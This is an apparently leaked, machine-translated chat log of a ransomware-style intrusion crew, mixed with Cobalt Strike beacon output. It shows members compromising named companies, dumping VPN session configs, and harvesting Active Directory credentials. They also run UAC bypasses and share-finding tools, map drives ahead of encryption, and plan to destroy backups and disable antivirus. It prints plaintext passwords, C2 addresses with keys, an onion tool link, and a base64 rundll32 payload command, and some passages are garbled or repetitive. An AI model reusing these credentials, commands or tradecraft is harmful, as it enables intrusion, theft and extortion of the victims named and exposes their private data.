[+] Leaking sessions to dump configuration.
     [+] Found: SessionID: P8v0xh01buLhUv8weQAbR0hPpBaj0QXcQnJi1JTbpck= userType: 1 userName: hemrick Password: HEcbccanal20201996 Domain: CANALBARGE
[+] Done with https://50.233.57.77, found 1 sessions
1
[+] Saving session data
[+] Trying session P8v0xh01buLhUv8weQAbR0hPpBaj0QXcQnJi1JTbpck=
[+] Saving config to ./Dumps/50.233.57.77/config.sqlite
[==================================================]
[+] Config dumped
[+] Parsing configuration data

[+] Finding users
[+] Found 209 users


[+] Finding AD credentials
[!!!] Found Active Directory creds
[+] AD creds :@10.0.10.12
[+] AD creds :@10.0.10.12

[+] Looking for LDAP domain credentials
[-] No LDAP credentials found.

[+] Looking for RADIUS domain creds
[-] No usable RADIUS domain data

[+] Parsing bookmarks
[+] Found bookmarks, Hunting for creds
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 115, 'name': 'net extender', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'jhecht'}
``into the access''.
1. https://50.233.57.77
2fa, there's nothing in the bookmarks, backup codes don't work
```
Try to add your bookmark here ``1. https://50.233.57.77``
2fa, there's nothing in the bookmarks, backup codes don't work
 
`2. https://173.247.171.106` - #grantweber-com
have access to nas and to av, no to the sphere, looked everywhere, can close172.81.67.174 (retif.com) no creds from NAS that in work from them (skype ip) and at what stage or for what reason is not in work3 vpna issued so tell me tipshotpay friends really want to sleep, very hung up today
tomorrow, tell @tl1 he will order a new one and shoot this one if there is trouble) or a new domain, I don't know) fix kobuuli plzili 5 minutes hangs on, then resets again u user4 session alive
i think i have a problem with cobalt domainlists of all lA's wherever they were taken, send them to the groupada, almost the same everywhere and do not roll on the server from all 10 were taken off lA? 10 + and how many user's? and check just net view on this host on the user's go[ ](https://mediaeveryone.com/channel/general?msg=pRohhnJJx2iZKt2ct) and on the user's? in lps write a new passport access to change the password where he writes that he has access to the balls admin$ remote and tds what servers? without a domain not allowed, but we removed users from the servers, and there is no this user and his group without a domain? yes
says just usmb_login what does it say to these hosts? and you have checked all hosts? user8 no, I will not say the parameters, and the context was microadmin (nddevbernst)and what was the context at the time of launch and parameters? but it does not go there no many where admin sharytam was above outputuser8 ran, all outputs did not work lol you have not run before? there 20500 pc)Invoke-ShareFinder works, but tightly see the domain?
beacon> execute-assembly /home/user/TOOLS/2/SharpShares.exe shares
[*] Tasked beacon to run .NET program: SharpShares.exe shares
[+] host called home, sent: 117815 bytes
[+] received output:
[*] Parsed 0 computer objects.

```
Is there anything you can do about it?) **deadly wait **sessions will not wait for file in cis32 directory and disallow its deletion``.
The "poc.exe" simply waits until the file is created in our target directory and then places an oplock in order to prevent the deletion (which will fail because of sharing violations)
this is what i don't understand, it seems to move the dll to cis32 and ros.exe to run it, it's not only move it, but run it as a LA to the file and it gives us the ability to run it as an admin, we have access only to this file and it's there, ok, we run it as a user without permission, it gives you user rights if you're an admin?))[ ](https://mediaeveryone.com/channel/general?msg=SbqzTPKW2M9FeShdA) and not vice versa? And in this case we have rights to run our file from this pathThe point is that this cis32 is in the admin$ ball and if you have access there, it gives you admin rights/systemIt's clear. But as I understand the whole point of this movement is to put your file in istem32 without rights. And then this fact should be used in some way. But how it is not clear. It seems, that there you can run applications from it, which UAC will not swear, but I am not sure) for according to the author's article, when loop ntuser.pol works it removes the file from system32but its essence is that it monitors when file is created and prohibits its deletion.exe?[ ](https://mediaeveryone.com/channel/general?msg=E8XQ2yp8EmqGYw4xB) as far as I understand it is very simple, but I could be wrong[ ](https://mediaeveryone.com/channel/general?msg=sHoWE5nicZ62h7BrQ) well, it exists now, but in new sessions not a fact)Well, the implementation is a little bit vague)I read, but users on computers did not find it. Yes, and the system is everywhere[ ] (https://mediaeveryone.com/channel/general?msg=a7JZYiR6HocfAtrhj) who checked? still the same at 10 +-[ ] (https://mediaeveryone.com/channel/general?msg=KAc6NFyvxPs9ZcrNy) current users are nowhere else LA?[ ] (https://mediaeveryone.com/channel/general?msg=uWyh8hz2oxQYBmsQM) with what? by the way, what about ava? about what time? still the same, can not get YES and can not get on the cars that interest us, so what do we have on the current grid?aha okada, a week ago + I told you all the new cobs? a little later I will say new sessions today will be daponyalon Tutu 3 again I fucked up ... those who are in the network I now 4 7 9user8 sickly4) I have rocket lag or you only 3 now? Hello Hello all on new now to clarify - while with the old let me refineEast old do not know where to go to the oldDa, while in the old. New will be? hello everyone)
there are sessions with what to work with?.Hi pleasant rest, in toucha well, so even I will have time to sleep myself in the office 15.10 at 13:00-14:00 Moscow time :space_invader:now clean up only ... if I can so tell me what time plan because I do not know and I need to set the alarm clock, leave when you come to fill the builder dllok and then turn me off here another 7-8 hours in any case, I'm dead here as alive but not alive at the same time) all like zombies need to sleep normally would like to tomorrow
or tomorrow
I'm confused Tomorrow, what time? Before tomorrow, let's go around 11, I think tomorrow will be sorting out current cases, and the day after tomorrow, maybe something will go to the block? Zavata to what time, and tomorrow at what time? at 22, yes, then wrap up for today@tl2 At 22 home? No, in principle, it's almost 22 ...
@tl1 said what time tomorrow? What time? work in the morning sorry guys I have a rocket failed and I did not notice
if anything - write if any urgent issues need to prepare for closing Give me your dll, I'll throw you on the network and create a conf@user4 for you a separate task will be file sharing, ways to transfer files and other things i hope i do not need to explain that you do not shine your resources under the umbrella?you can get from /16 from heredns? @user7 check the tab gohostsokok I understand my stupor, now everything will be you strange) throw the networks where you have not yet reached a deadlock and then you have no work) and dk that you get from the scan sabnets scanning results when you are connected to a VPN you can quite work bladhound?
it won't even ask for YES without an rdp

```
of course i asked you what to do, you have several accounts, there are scanners and how to work with the vpn you know how to work there is a working vpnp i understand when the username/password did not fit yes i said that you are responsible for them? i had to directly supervise the operation? "let go"
i figured i was just a questioner here so he wouldn't even ask for yes without an rpdtam there were work options anyway why you let @user7 off so easy + i figured you and @user8 were still together and why not work with it?\tried rdp itself authorizes under these creeds? \tried rdp, so no user can walk on rdpv `lrhc.org` entsentireprise appeared admin rights in the neighboring domain, half a day tried to remove the ADinfo. Now in the next domain found a car with servakom 2003, ms17_commands work, we think to add there a local admin and already next work in my last was 2 users. from one creed did not fit, the second is 2fa. so while with @user8 worknu how are you doing?if progress on the current nets without conf confi you collect information from yourself locally as I come immediately createmne need to leave, I'll be close to 6 hours + write me back in a ls names of folders that were inside the archive all otpolzhem in personal info skilka files:thinking:@user8 you in control of their tasks, I'll ask you)he while the chief in this problem in general attack questions @user8a, just I guess I do not quite understand the indirect workd we sit next to) if you mean it?I can give you 3 people a general question confab, they'll have their own nets, why come to you in the confab?@tl1 since @user4 and @user7 are with me, can you put them in the confab?around 6 or 7 I'll give the network with the DA and we'll prepare it for closing for the most part today independently I'll give you files like him yesterday, for all questions please contact him @user4 @user7 you indirectly work with @user8 @user8 with his so @user3 works with the forum I can not go further, can me to user8 to help Yesterday I have no access to the coba (Filling the forum with what by the way what are we busy with?then I explain the tasks for today + so, all gathered? hello all wait until 20 minutes and then start on the spot no one is there? hello all hello Sessions still no? what about the sessions? @tl2 maybe you say something? @tl1 Any good news? do not know yet @tl1 Sessions will be?
```
beacon> shell net user ndevbernst /dom
[*] Tasked beacon to run: net user ndevbernst /dom
[+] host called home, sent: 56 bytes
[+] received output:
The request will be processed at a domain controller for domain jdossn.local.

System error 1355 has occurred.

The specified domain either does not exist or could not be contacted.

``Today almost all of the offreleases'' comps didn't give anything either
no web services found, no whining either
let relay and went home)nhii what did yesterday's results? hello all know that @user9 has yes asked how many networks with YES do not rise@user3 you have with YES network?[ ](https://mediaeveryone.com/channel/general?msg=idsBNFAZrjwCKbFNG) I said no doubt I can not sayI have 1 YES real network 1 network.and tell me how many networks with YES got that no doubt normal networksI work help colleague will faster I work more 3 people +++ no more sessions so all worked out what was it?quit it i don't see any real users there you got further into the domain? or not....humankind will be like labavo no free as it looks like that yes whether laba or something else there + mostly 7/hrs i don't like it yes@user9 ? no trusts you say? make a conflate plzstateoilcompany.com - strange network
34 users, 66 computers, no trusts can i getstateoilcompany.com ?I'm not sure if I've got a new one, but I've got a new one, I've got a new one, I've got a new one, I've got a new one, I've got a new one, I've got a new one, I've got a new one, I've got a new one, I've got a new one, I've got a new one, I've got a new one, I've got a new one, I've got a new one.com I'm still the only one who works with it? ballymoregroup.com confab check it out guys there is a session with a local admin zazl not touching it priorityes it but I took ballymoregroup so what to take, zazl or ballymoregroup? ballymoregroup take it to work
there's a big case
can be for two at a timeadinfo taken off still get a taxi? well, i did not believe it) ``
>mail: tyler@gaudyme.com

``Ah ouch''.
>userPrincipalName: destineeg@DressinGaudy.local
``I don't believe it,`` in the adinfo suchDressinGaudy.losale more +3 sessions and configs too from that domain have 3 cars
2 has a client, but configs on them do not see and they are now dead
on the last client does not sit sitbelt is silent? config and does not smell of it in bluegrays alive there is a computer without a client vpnapodlecu who took rtpcompany.com there is a second session you do not write in the comment your domain koba, there is written externalnikBK new bots 15pcs[ ](https://mediaeveryone.com/channel/general?msg=MgtwStYbXqTWFDJkj) do confuber work take whoever.com10 minbrbr newbots are in bkHowever sexy all off that you can kidajeet more sessionsfrom him on the tachka look for vpno is bluegracegroup.comadinfo no as not visible domain[ ](https://mediaeveryone.com/channel/general?msg=oQMWyvPFBzY3xipch) hurriedly))com`brighthorizons.com` confi pleaseDo spav https://neteric.com not come[ ](https://mediaeveryone.com/channel/general?msg=FfcCPvXueqb75SfzY) you'll laugh, but in adinfo no external domain if you pick up then writekobel.com - confi already forgot how to do it? domainvneshneed to give confi TomHolzerFord.local[ ](https://mediaeveryone.com/channel/general?msg=ET5DAcd6gWFrqMsfh) take awaykobel.com take away here in the netcob and work[ ](https://mediaeveryone.com/channel/general?msg=Kw5w8z6gz9EsRLCTt) here sessionsAnd work with what? mine by the way, flew in, although before did not want to. they clean daona empty the rest in the shit after closing the gridthere are only 2 so far clean not personal took74.118.138.118
https://neteric.com
----------------------------------------------------------------------------------------
104.243.44.69:13574
Cqr7797e1iSJyzFwnyTPoECVpWqqOSUGUZ7
pf,hfk``
74.118.138.118
https://neteric.com
----------------------------------------------------------------------------------------
104.243.44.69:13574
Cqr7797e1iSJyzFwnyTPoECVpWqqOSUGUZ7
``````
104.237.4.48
https://valcp.com
----------------------------------------------------------------------------------------
199.127.61.214:33914
WLzR0eDj5HH5PGAwCkOn9Dv2byQT64cQ3GY
``Divide into groups by the way a couple of cubes workers are red, so where there was already spawn do not touch`` ``
199.127.61.123:15724
npUPwGS5AK1pPU6W6ZxmvzzkdhsqzqaRFWa
``Get the cobb up? oh, what a good time to fix it, you know you have to take it before they fall off if you already have a session in the cobb da fuck with this microtic, will soon be ready to do what?general alg you already know) Okay, but I want the map to reflect the nuances of the situaDa rdp came and raschal Well I can describe here is how it was today So there's a situation review later or how to be with non-attractable servers How to be on the server without charThere are now busy problem with the internet and here is the motive for the question just so you do not get mixed up in the algorithmto leave all if it helps youI am an artist I see so This is my vision a, even so the right algorithm on the left tips How to start Well, the beginning of this turn in a token can take the command outside the map true, to reduce the size you're still at hand bats and so dto leave it if you understand and 1 line is a turn in the token) the beginning of the map turn in a tokena little strange you got a ok if offsite av and other things why? faster would be to scatter ephemera I think the same way from 100 mapping in both cases and if you have not found it, then only mapom if 100 then it is better to otkl av + win def and scatter ephemera if to 100 servers you can get along just the same only mapovoreally here an important aspect of this?so will dozabyla forgot i do not see the division to 100 servers and from 100chem to change? report as a router will beroadmap, waiting for a routerpodobytesya what to do so i will add you a new tul `https://ws4nrdkwmjbxrv56pn4knxaex6ttwnjbdrshd6gfq2hw324ugwlgwfad.onion`
please send me your names from here.
23.19.227.54
https://urlbig.com
----------------------------------------------------------------------------------------
45.126.210.66:22514
cJZw4bgWNBuYAeLXToHzNLYZOqnTS8CJwIe
``Well, I don't remember the hostname and I can't get into the koba yet.``
now throw the kobu in the history of bicon no unions do not see ``
beacon> shell net use
[*] Tasked beacon to run: net use
[+] host called home, sent: 38 bytes
[+] received output:
New connections will be remembered.


Status Local Remote Network

-------------------------------------------------------------------------------
Unavailable G:        \10.10.34.201\c$ Microsoft Windows Network
Unavailable H:        \10.10.34.242\c$ Microsoft Windows Network
Unavailable I:        \10.10.220.95\c$ Microsoft Windows Network
Unavailable J:        \10.10.220.67\c$ Microsoft Windows Network
Unavailable K:        \10.5.68.232\c$ Microsoft Windows Network
Unavailable L:        \10.91.18.5\c$ Microsoft Windows Network
Unavailable M:        \192.168.0.59\c$ Microsoft Windows Network
Unavailable N:        \10.91.18.21\c$ Microsoft Windows Network
Unavailable O: \10.10.30.64\c$ Microsoft Windows Network
Unavailable P:        \10.10.35.60\c$ Microsoft Windows Network
Unavailable Q:        \10.10.34.222\c$ Microsoft Windows Network
Unavailable R:        \10.10.39.180\c$ Microsoft Windows Network
Unavailable S:        \192.168.254.156\c$ Microsoft Windows Network
Unavailable T:        \10.91.18.76\c$ Microsoft Windows Network
Unavailable U:        \192.168.0.86\c$ Microsoft Windows Network
Unavailable V:        \10.10.72.247\c$ Microsoft Windows Network
Unavailable W:        \10.10.35.101\c$ Microsoft Windows Network
Unavailable X:        \10.10.35.85\c$ Microsoft Windows Network
Unavailable Y:        \10.10.73.9\c$ Microsoft Windows Network
Unavailable Z:        \10.10.72.139\c$ Microsoft Windows Network
The command completed successfully.

´you gave the cob above I thought it was she and isto me to compare it nowhere else exactly where you mapped to dumping) ah, so you need to throw the coba, so immediately would have said)) and check whether the maps remained after I wanted to see the place where you pamiely before dumping.she and I was interested)in the coba no net or no in the coba?
because I may have it in the one that fell off mapiltekonnect only in myteb no at allTESTCONNECT.lrhc.losal or here do not remember exactly, but here like mapil
TESTWEB.lrhc.losal to check if they are still there I am interested in the host where you mapped from the list
```
10.91.19.195
10.10.31.42
10.10.39.148
10.10.35.118
10.10.220.202
10.10.35.19
10.10.80.102
10.10.220.88
10.10.222.38
10.91.18.34
10.10.34.187
10.10.34.183
10.10.30.154
10.5.68.126
10.10.222.61
10.91.18.94
10.5.68.241
10.10.221.21
10.10.220.59
10.5.65.51
10.10.220.41
10.10.221.17
10.10.35.137
10.10.73.6
10.5.67.49
i want to check if there are any mapps left before the cipher started, then i went to another cipher and told him that the first koba fell off and there mamapilosya not kobamapi in question because the vpn fell off and did not have time to check this is it?
23.106.215.165
https://palside.com
----------------------------------------------------------------------------------------
199.127.60.23:57230
b5b9BPVoH7jnJt2OEQlUbLxxjvXOvoKa4Ue
``now there are no cob connected to the hostname where mapped before the collapse did not have time to check the case when the cob fell off? to the question of this ``arms: 791/1040 mapped, the cipher in question `` with a possible extension to 12 by the time until 10 we have until what time today? in order for you to estimate this time when closing large volumes of data and general info: cipher speed ~20-40 minutes to 1tbokay+ all clear?yes, understood? there is 1 main domain and several secondary domains and you estimate these links as default between all domains you forget to analyze the bundles of domains from small comments see his circle of users by groups and you see more tróós poznachennyh people in the network, also important to watch and there were interesting files on your computer and among them already found chrome
login: root
pass: -you then discounted a memberof one Dan would have been longer if you had not given a tipI thought I would have to spend my last day off to work) for Saturday solved the problem with the spheremodelshafto immediately I want to mention such moments as reseche network on that probably all and put off the network after all servers have pulled in already will not work that will extend your online lifetime for an hour or more just times less you will still noise whether or not it and immediately this question if you have + + idea is understood?the main thing is that the server is unreachable, the calls of employees are unavailable, everything is slow, the network is frozen, another conversation it's like, until you log on and go to the snaps section, if admins are so pedantic that they go to check snaps every 10 minutes or they might not get it?I understand that it's a scare on the net, but when we've already shredded the avs, lost snaps, does it make sense to hide?or will not notice that the network freesitka how long the admins will not take a head360k requests per hour500 requests every 5 seconds excluding your internal (a la mapping and vmik to open)100 servers in the network and while you are working with them 1 hourk how it works on the numbers just so you understand that the client dropout is not simple ping it quite a full-fledged request in the slip because inject should be done almost simultaneouslyeven if you worked in a command and while I was pulling the other mappings to the servers are already drawn and while pulling more additional servers, the old flurry you pull N servers at intervals of 5 seconds such a remark to us still have comments on the grid, other than the server stall?))mapper228+)))mapper? without lukashenko228 only adequateyou have the ability to choose a name for the alias, not critical it will be without graphics as I do not think it is necessary in this case if you want such a format - yes there can be a cna script, which is given a list ip, comma separated, and it matches these ircons in a specified session this optimizes the time during the mappa armatures result of processing you know and for each server copy line by line `` ``
execute-assembly /tmp/SharpMapper.exe host1.domain.local 123.123.123.123 testhost2 /full
execute-assembly /tmp/SharpMapper.exe host1.domain.local 123.123.123.123 testhost2 /full
execute-assembly /tmp/SharpMapper.exe host1.domain.local 123.123.123.123 testhost2 /full
execute-assembly /tmp/SharpMapper.exe host1.domain.local 123.123.123.123 testhost2 /full
execute-assembly /tmp/SharpMapper.exe host1.domain.local 123.123.123.123 testhost2 /full
execute-assembly /tmp/SharpMapper.exe host1.domain.local 123.123.123.123 testhost2 /full
``Do yourself a blueprint of this command and you will see where you want it to go (text editor), and it will work like this:
``execute-assembly /tmp/SharpMapper.exe host1.domain.local 123.123.123.123 testhost2 /full` + now will be in development Marregvash task to make this map taking into account such small things as "the server does not open what to do "even just to 100 and from 100ya want you to get away 2 main outcomes: up to 100-150 servers and above and while you do not have internet you will take up writing roadmap for the process of running the build2 item my fault3) or you are nervous or something, but you forget too elementary things2) the process of our work in such cases is terrible1) I want to thank you for the process, the network was hard and unaccustomed, but you did it judging by the statistics and you need time to work the build itself you have 2 hours at most and speed up please for what) in the future I will know, thank you alwaysDOMENCHts not specified in the hostnameask a comrade easier) you have 5 people around what exactly is not configured as follows ?help him help him comrade still do not know how to set up a sheet for coba go to the confab+@tl1 all here hello4 min max max just a little bit and all will be soon when? soon all will be soon what's not all there yet? good morning add it he computer froze, about to reboot ...who to give in the group? @tl1 ``
Domain = cn.net.ntes
Adusers mail = mesg.corp.netease.com
``A couple more+you'll have sessions? \you have a name for the conf+? @user3 give kobu nearer to 2 will kobu be ready da@tl1 New sessions will be there? what progress? by 10 will be new sessions as a variant it is possible to get on dk through rdp for example if it is allowed it not da)is there any kredes?:thinking:? then this user can jump to dk if there dk is a dk they say the french mikat
Authentication Id : 0 ; 63768393 (00000000:03cd0749)
Session : Interactive from 0
User Name : nddevbernst
Domain : JDOSSN
Logon Server : JDODC64
Logon Time : 10/23/2020 2:15:49 PM
SID : S-1-5-21-3450394983-289173729-1299264434-241049

``in the output mimic or in the ad info? is that where the user went? logon seveer in the output mimicvoice in an hour still in questionnews by how much to expect? old are theresessions working?good afternoonhiGood afternoonTo avoid unnecessary noisedsync by the volume domain sootam already remove a couple of critical pkvm already work, as you prepare, I'll give you sessions from the 2 extended domainsvot yes from that domain) ``
overland.com\dynamics:bobc@t!
overland.com\Administrator:Vi3wSon!c
overland.com\mahesh.admin:Changeme!
overland.com\zerto:CR@CKer$
``To dk from the main working domaina to the domain how to pass)
CRCKer$``
Pinging AD1.overland.com [10.69.0.35] with 32 bytes of data:
Reply from 10.69.0.35: bytes=32 time=10ms TTL=127

Ping statistics for 10.69.0.35:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 10ms, Maximum = 10ms, Average = 10ms

beacon> portscan 10.69.0.35 445 none
[*] Tasked beacon to scan ports 445 on 10.69.0.35
[+] host called home, sent: 93285 bytes
[+] received output:
10.69.0.35:445
Scanner module is complete

``Nothing to remove here, it's a prod segmentetad, dxink and so on to remove themselves or is there? the main domain near you are in the trust prodovom, do not touch it immediately do not rushschellyn.comdomain kobydavay+may offer another network to work until the news? do not remember, I think I saw where something
i'll try the pass if you have it) do they have outlook clients? no, the pass does not fit, the ones i've tried
the rest before the weekend user8 tried, but i don't know what he had there2fa? in the mail access to the neta with the mail we have what? browsers directly from ALL computers, also nothing else check the files, so far nothing (checked sccy? eight? One quit[ ](https://mediaeveryone.com/channel/general?msg=nxpga4pHxRxHF6qxv) 4 in scythe all off, even in the center
ping going nowhere, domain unreachable may well be lying useful dokuoksche pay attention to file servers in IT folders, let me know how you check it.Check the files, there is nothingThere are no browsers on all machines I think the chance is high enough5 people in a working day can find accesses? There are no creeds from nasovi then give out a couple of vpn, but there is no direct accesses.snu.edu deadlockedIt turns out that only sccy and snu.edu are out todayWill there be any new sessions? sccy seems to be a couple of sessions aliveWhile we check skytech, there are a couple of sessions there-is there anything alive in `CORP.TELEVISA.COM.MX`?what is it that you do not have enough of it? hello all for the first time hear lumisco.com, matches, gpj and? you are now in work 3 grids, before leaving for each report: what was done in the current task, what difficulties, what vectors, etc., started yes?
oh how well in the test lab on Windows 10 version 1909 with defender on
SharpFodhelperBypass works (https://github.com/FatRodzianko/SharpFodhelperBypass)
sample run - execute-assembly /home/user/Desktop/SharpFodhelperBypass.exe Y21kIC9jIHJ1bmRsbDMyIEM6XFByb2dyYW1EYXRhXHg2NC5kbGwgZW50cnlQb2ludA==
command in base64 (cmd /c rundll32 C:\ProgramData\x64.dll entryPoint)[ ](https://mediaeveryone.com/channel/general?msg=hhBzAGf6Z9ZQ27wgX) This thing works in a test lab on win 10
It opens cmd under admin, but you can't give it any arguments, i.e. tell it to run our exe or specify a command.
what can be done with it then? https://github.com/hfiref0x/UACMEhttps://github.com/L3cr0f/DccwBypassUACэто till lunchtime the problem is above + you need to look for methods of bypassing UAC, or fresh spoolsv[ ](https://mediaeveryone.com/channel/general?msg=yjAALDWw963Zv3b8j) On the forum lies, gave the link above
Finish it is not real, I think it's infinite:space_invader:mindmap finished?
 Actually it helps to search for PCs assigned to users
namely, in the "search for techs" task.
you select them from ad_users and use this tool to find their PCs where there will be valuable information about the network, just need to be information about edr, backups, etc.
Search for keywords like network, admin, tech, etc.

``[ ](https://mediaeveryone.com/channel/general?msg=N9P98kTsatAzhy5fZ) 1This one https://mediaeveryone.com/channel/general?msg=kKPqGtPJd8Kpmd6BCехе under which you write in trethThere? https://mediaeveryone.com/channel/general?msg=Xn2ZPrF95sAJ44ecHтак is not it? I asked if you collected sharpshooter and you said yes``.
https://github.com/HunnicCyber/SharpSniper
``wft?[ ](https://mediaeveryone.com/channel/general?msg=44d8DTrJDJMDKS9Qf) 2[ ](https://mediaeveryone.com/channel/general?msg=rJXGJZcTyHBBMgpxP) 1 lol? let's put him in the aggressor whale.
i can't find it on the netlogon. i got it, i lost 445 port results file. what kind of pc? i scanned all the adfinds on /24, only 3-4 computers in the game. did you look for vg and external backups? the spn has hyper-v replica service on several machines, this is the most i've seen.

0 trusts
37 servers
1205 armies
I think if you pinged, it would be much less than that and how many servers, armies and trusts we have, there iscsi empty
there's ehs, no creed
there are two servers
bgukhoveam there's a tiny bit of .bco-shares
bally44backup there's a lot of backups

nothing else found a la wsphere, hypervisors, etc[ ](https://mediaeveryone.com/channel/general?msg=zbgfwydjaxhwyWEwu) any signs of cloud solutions? let's complicate the process today, let's check the WOL. then write to the group the number of pcs, arms and trusts chromium admins, chromium all polozakonea, ran through all computers where admins sat yesterday then today we close, admins surely had no hints of claud or vg on backups?yes[ ](https://mediaeveryone.com/channel/general?msg=WGerCebrheZx2Wd3o) there are all found, what do I need? found one more guy, his credentials do not bring up a session on three computers. i remove the credentials from them via CME[ ](https://mediaeveryone.com/channel/general?msg=TQsXdkctah9AnbJNo) the same thing
There are a couple of subnets left to scan.
so far nothing in bellimore still in search of the creeds from the echyotr write down, what are your results? in preparation for closing in balimorladno, clarified. if you are done with the lab go to the networks[ ](https://mediaeveryone.com/channel/general?msg=HMAxxaonYPKBkydbG) 3 days ago I tried to build a server, at what time do not remember. fuck.... I'm already confused on all sides.or am I misunderstanding? just not setting up and building the server so you were still busy with lab 3 days ago? for lab, should have been but nothing started on it. I put it aside, it's at my desk. Then I brought a different office on it started up and now it's spinning. Do you want me to describe the hardware? [ ](https://mediaeveryone.com/channel/general?msg=5ywWviKNjaaKB8v2B) and this [ ](https://mediaeveryone.com/channel/general?msg=NMJXZRRGGaRR3RnGr) + [ ](https://mediaeveryone.com/channel/general?msg=FvaSSFmTR9MEnhQP6) I already saw it, it's just 16 minutes on the 22nd, counted as three days[ ](https://mediaeveryone.com/channel/general?msg=cxkivPJYBETLt6ffr) pieced together = assembled? What kind of server? 100% Yesterday today I did lab, I'm not sure. Before that I was piecing a server on a Chinese mother that does not fuckin' work! that was three days ago. so yesterday and today? yeah, yesterday. not much sleep. i don't remember what happened three days ago.

I sign up uni yesterday yesterdayrahm, maybe I'm already confused uni it was yesterday ? gave you an individual problem on the vpn like, which then @user7 left, strong strong and so on)you said that the lab I remember the day before yesterday I asked you to work on the networkzakonchilked about 10 minutes ago. Do not count in hours. I think since yesterday, wrote to you. how much time was busy with this task?
Finished with webmords, doesn't take much off
found:
1 ushi (no creeds)
1 us (no kreds)
iLO 4 ProLiant
iLO 54 ProLiant
the last two things have not figured out what they are, and no Credits
iLO 4 ProLiant 54 ProLiant not yet figured out what they are, well, there are no Credits
main.crispregional.org
```
also looking for hints on the backups in the vg and the cloudswrite at the same time, that on the tasks of all, let's go to the main tasks thank you tell me that he has 10 minutes to contact the boss promptly call pliz @ot let him answer bosu and here we are all trying to understand the situation if not then it turns out that @ot checked himself, none of us have checked so, aware of this kitchen were only @ot and @user3 no) and you sent them to check ?what's the problem with the tests? we don't know about it, only @ot does. ask the others about the tests - @ot
tests - I don't know
lab - @ot and @user3
the last one is closed, @user3 was busy configuring it so in order, who did the interviews, tests, labs maybe someone will have problems depending on your answers)okay, never mind, what do you mean by that? and i also talk about tests and labs we talk about the tests and the interviews specifically labs i mean what works with it, from what i observe, @user3 and tests who checked?@ot who conducted the interviews? so? so she rather under the direction of @user3 over which @user3 still works eeetu labaa)from2 is it who you know about the lab, tests and other things under the direction of @ot? distracted yet? then they immediately 1 dk and lifted the same pdkvot 1 dktakta all ok?
List of DCs in Domain
    \\WDC1 (PDC)
``I did
`shell nltest /dclist`
without `:````
beacon> shell nltest /dclist:
[*] Tasked beacon to run: nltest /dclist:
[+] host called home, sent: 46 bytes
[+] received output:
Get list of DCs in domain '' from '\\WWDC1.waterway.com'.
You don't have access to DsBind to (\\WWDC1.waterway.com) (Trying NetServerEnum).
List of DCs in Domain
    \\WDC1 (PDC)
The command completed successfully

``shell nltest /dclist:````
beacon> shell net accounts
[*] Tasked beacon to run: net accounts
[+] host called home, sent: 43 bytes
[+] received output:
Force user logoff how long after time expires?: Never
Minimum password age (days): 1
Maximum password age (days): 90
Minimum password length: 6
Length of password history maintained: 10
Lockout threshold: 15
Lockout duration (minutes): 5
Lockout observation window (minutes): 5
Computer role: WORKSTATION
The command completed successfully.
``nltest output
beacon> net domain
waterway.com

beacon> net domain_controllers
Domain Controllers:
[-] Error: 0

beacon> shell nltest /dclist:waterway.com
Get list of DCs in domain 'waterway.com' from '\\\WWDC1.waterway.com'.
Cannot DsBind to waterway.com (\\WWDC1.waterway.com).Status = 1722 0x6ba RPC_SERVER_UNAVAILABLE
I_NetGetDCList failed: Status = 6118 0x17e6 ERROR_NO_BROWSER_SERVERS_FOUND

beacon> shell net accounts /dom
The request will be processed at a domain controller for domain waterway.com.
System error 5 has occurred.
Access is denied.

found ESXi, no credits yet
checked all my DA's with sniper - they are sitting on servers, in chrome only one had password without username from unopened snout
Checking of scanned interfaces is in process.
sniper check all sysadmins and i.t. guys in the process I have a couple of sessions in the slipway, the water I have not seen nimble here, hashes are different, but not valid nimble is dead? all empty? not even hashes are different? 6 Computers where he was with the rights pulled and in them for now and stay. la was you did not have YES? hashes gave tl2 so far nothing interesting, other than what I wrote in the conf, did not findKred still not found, run the invey and caught some interesting information - the assumption that previously found seven in the yr and not in the domain looks reasonable, because found several other similar compounds. Scan the subnets to 445 443 22 80. Search the files on the computers where you have access to do not forget the cloud solutions.
main.crispregional.org
```
There is a sphere, av, backups
Looking for backups in the groups in `CORP.TELEVISA.COM.MX` I`ve jumped into `CORPSFECRT04` there is nothing on the creeds, now I'll go further untwisted Write down the status of work to get there. like any creeds fit there, but only as a normal polozaki maybe something like that : //www.zoller.info/en/products/tool-management/storage-systems/keeper) and what the drill can not kill? yeah hz. they sell weapons, and these drills assumption : //www.zoller.info/en/home?r=1```
10.0.0.24 0EA78803 [Win Embedded Standard 7601 SP 1]

Probably because it's some kind of cut-up sevens but you need prufy as a variant - that's the title of the crossover.com looking for crescendos with the rights. While I was looking for found ``.
 (platform: 500 version: 6.1 name: 0EA78803 domain: ZOLLER)
``and now looking for confirmation of a second domain, who works with it? access and other stuff, and looking for external, internal storage, and the quality of the locale itself, we'll give up on that about creating backups
looking for backups, auth, then listings skul, mail, filescredits only no backups found#ballymoregroup-com
check the web muzzles that naskanii naskanii write what are you doing? in another) push @user7 into the confab to see where everyone is at? hello:space_invader:everyone say goodbye until tomorrow it is mandatory items + cloud check backups in vorkgroups tomorrow will close a couple of networks and tomorrow by 6 pm will finalize `benihana.com
starting user is neutered, kerbs are removed, hell is removed, ShareFinder is dropped

`ballymoregroup.com
found 2 nasa, one dead
2 backup servers found, listings made
2 exch of hell not pinging `Ping request could not find host`
pinging whines in the process
LA starter user on several machines. Went everywhere took off browsers, hashdump and mimic. From all of this found two different hashes YES, but apparently old. No Kerbs - writes something like ``[X] No users found to Kerberoast!
``````
main.crispregional.org
```
What's left:
backups to find, optionally AV tomorrow by 4 I think half an hour more, what are we up to today?
```
	main.crispregional.org 10.1.20.213 SYSTEM * PROVATIONTEST
``that's what kind of silent excitermelanu and all and alive so I keeled it a long time ago better spawn it? why should it die in the first place it won't die do a better spawn first do a spawn kill the session will die
psinject 4728 x86 Invoke-ShareFinder -CheckShareAccess -Verbose | Out-File -Encoding ascii C:\ProgramData\found_shares.txt
````CheckShareAccess` ?
ERROR: Invoke-ShareFinder : A parameter cannot be found that matches parameter name 'checkaccess'.
``where is the -checkaccess flag wev beacon> psinject 4540 x64 Invoke-ShareFinder I also wondered if it shows access balls, not just enum balls? ah, it's for that message) yeah, I don't know)) I thought roll call is to whom and where?sccy.com it turns out...no big deal, it turns out? not a wrong password? it says access denied it if you're talking about the sharfinder output there above look it up, access denied
